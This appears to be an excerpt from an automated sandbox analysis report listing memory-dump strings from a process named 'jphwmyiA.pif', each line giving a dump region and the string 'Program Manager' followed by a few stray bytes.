Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH$
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH#
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH"
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qwQ*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@;m%
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH,
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4b\|*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH)
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt(l
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH'
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH&
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHR
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql8B*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$XX*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHN
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDKy
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q41;*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH]
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q &A*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD88*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHM
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHK
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXt{
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHI
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHH
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHF
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q/A*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHs
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8JB*
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH{
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt&w
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHx
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHv
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHc
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd8]%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDQM*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,-L*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q Xe%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0uN*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH^
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHl
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<Qf%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhy/*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|7v
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh8P*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(-Z*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\yT%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q Xf*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX1R%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q04p%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHik*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q86t
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD.
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLa*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD+
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD5
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDNw
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD!i*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD3
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTr%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL_v
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD)
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|,y%
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD(
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD'
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<ba*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL>k%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDP
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDN
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxWy*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDM
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt%b%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@bS*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDV
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDT
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,Ex*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDR
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxf4*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx%U*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlPn*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD?
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD<
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDPl
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q ;F*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDq
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDiy*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDy
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDx
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDs
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL>m*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD`
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdbl%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD]
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|,{*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDg
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qE0*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4bz%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDb
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,X<*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp%p*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(XJ*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL`%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q6u*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q([q*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8bn*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD{
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0%u
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql%\|%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8gb*
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@-
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@+
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(Jy*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@)
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@3
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@0
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXJk*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@M
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@nx%
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@L
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|1n*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@F
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4go*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@T
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@R
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlgF*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTdw
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx1z%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@&j*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDnl*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qGm*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(]=*
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@8
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@A
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@@
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@>
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp*c%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@l
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qr^*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@g
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHCn*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtCl%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX`W*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|y\|%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4 t
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@[
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@Y
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@V
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@e
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT`d%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@c
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@b
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@`
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@^
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0zA*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,2?*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<&x*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\rx
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@nz*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTay
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@}
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDCz%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@{
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$]K*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@x
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@v
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<1s
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@~
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt\x%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4JP*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<$
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTug%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<0
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|\_*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<.
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt#y
